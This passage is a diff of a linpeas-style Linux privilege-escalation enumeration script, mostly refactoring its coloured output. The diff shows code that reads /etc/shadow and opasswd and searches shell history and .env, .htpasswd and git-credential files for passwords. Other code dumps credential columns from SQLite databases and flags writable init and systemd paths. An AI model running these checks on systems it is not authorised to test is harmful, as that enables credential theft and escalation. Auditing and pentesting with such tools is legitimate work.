"s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" ##-- IF) Hashes in passwd file - printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC - if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Hashes inside passwd file? ........... " + if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Writable in passwd file - printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IF) Credentials in fstab - printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... "$NC - if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Credentials in fstab/mtab? ........... " + if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Read shadow files - printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC - if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Can I read shadow files? ............. " + if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Read opasswd file - printf $Y"[+] "$GREEN"Can I read opasswd file? ............. "$NC + print_list "Can I read opasswd file? ............. " if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" else echo_no fi ##-- IF) network-scripts - printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... "$NC - if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IF) Read root dir - printf $Y"[+] "$GREEN"Can I read root folder? .............. "$NC + print_list "Can I read root folder? .............. " (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no echo "" - + ##-- IF) Root files in home dirs - printf $Y"[+] "$GREEN"Searching root files in home dirs (limit 30)\n"$NC - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${SED_RED},") || echo_not_found echo "" ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Searching folders owned by me containing others files on it\n"$NC - (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IF) Readable files belonging to root and not world readable if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - printf $Y"[+] "$GREEN"Modified interesting files in the last 5mins (limit 100)\n"$NC - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," + + ##-- IF) Modified interesting files into specific folders in the last 5mins + print_2title "Modified interesting files in the last 5mins (limit 100)" + find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" ##-- IF) Writable log files - printf $Y"[+] "$GREEN"Writable log files (logrotten) (limit 100)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation\n"$NC + print_2title "Writable log files (logrotten) (limit 100)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` printf "%s\n" "$logfind" | while read log; do - if [ -w "$log" ] || [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found + if ! [ "$IAMROOT" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; - elif [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif [ -w "$log" ]; then echo "Writable: $log"; - elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g"; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; fi fi done @@ -3113,66 +3038,65 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Files inside my home - printf $Y"[+] "$GREEN"Files inside $HOME (limit 20)\n"$NC + print_2title "Files inside $HOME (limit 20)" (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found echo "" ##-- IF) Files inside /home - printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC + print_2title "Files inside others home (limit 20)" (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo "" ##-- IF) Mail applications - printf $Y"[+] "$GREEN"Searching installed mail applications\n"$NC + print_2title "Searching installed mail applications" ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" echo "" ##-- IF) Mails - printf $Y"[+] "$GREEN"Mails (limit 50)\n"$NC - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed "s,root,${C}[1;32m&${C}[0m,g") || echo_not_found + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found echo "" ##-- IF) Backup folders - printf $Y"[+] "$GREEN"Backup folders\n"$NC - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${C}[1;31m&${C}[0m,g"; + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; ls -l "$b" 2>/dev/null && echo "" done echo "" ##-- IF) Backup files - printf $Y"[+] "$GREEN"Backup files (limited 100)\n"$NC - backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; - fi; + print_2title "Backup files (limited 100)" + backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` + printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; done echo "" ##-- IF) DB files - printf $Y"[+] "$GREEN"Searching tables inside readable .db/.sql/.sqlite files (limit 100)\n"$NC - dbfiles=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 100) + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" FILECMD="`command -v file 2>/dev/null`" - if [ "$dbfiles" ]; then - printf "%s\n" "$dbfiles" | while read f; do + if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [ "$FILECMD" ]; then - echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; fi done SQLITEPYTHON="" - printf "%s\n" "$dbfiles" | while read f; do + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC if [ "`command -v sqlite3 2>/dev/null`" ]; then tables=`sqlite3 $f ".tables" 2>/dev/null` - #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` - #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" else tables="" fi @@ -3189,8 +3113,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then #Check found columns for interesting fields INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"` if [ "$INTCOLUMN" ]; then - printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${C}[1;31m&${C}[0m,g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g" + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head fi done @@ -3202,72 +3126,36 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Web files - printf $Y"[+] "$GREEN"Web files?(output limit)\n"$NC + print_2title "Web files?(output limit)" ls -alhR /var/www/ 2>/dev/null | head ls -alhR /srv/www/htdocs/ 2>/dev/null | head ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head echo "" - ##-- IF) Interesting files - printf $Y"[+] "$GREEN"Readable hidden interesting files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC - fils=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_MNT\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '\.msmtprc|\.env|\.google_authenticator|\.recently-used.xbel|\.lesshst|.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv') - printf "%s\n" "$fils" | while read f; do - if [ -r "$f" ]; then - ls -ld "$f" 2>/dev/null | sed "s,\.msmtprc|\.env|.google_authenticator|_history|\.lesshst|.recently-used.xbel|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|\.ldaprc,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g"; - if [ "`echo \"$f\" | grep \"_history\"`" ]; then - printf $GREEN"Searching possible passwords inside $f (limit 100)\n"$NC - cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100 - echo "" - elif [ "`echo \"$f\" | grep \"httpd.conf\"`" ]; then - printf $GREEN"Checking for creds on $f\n"$NC - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -${E} "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m," - echo "" - elif [ "`echo \"$f\" | grep \"htpasswd\"`" ]; then - printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - echo "" - elif [ "`echo \"$f\" | grep \"ldaprc\"`" ]; then - printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - echo "" - elif [ "`echo \"$f\" | grep \"\.env\"`" ]; then - printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${C}[1;31m&${C}[0m," - echo "" - elif [ "`echo \"$f\" | grep \"\.msmtprc\"`" ]; then - printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -${E} "s,user.*|password.*,${C}[1;31m&${C}[0m," - echo "" - fi; - fi; - done - echo "" - ##-- IF) All hidden files - printf $Y"[+] "$GREEN"All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)\n"$NC - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "\.env|\.google_authenticator|_history$|\.recently-used.xbel|\.lesshst|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head 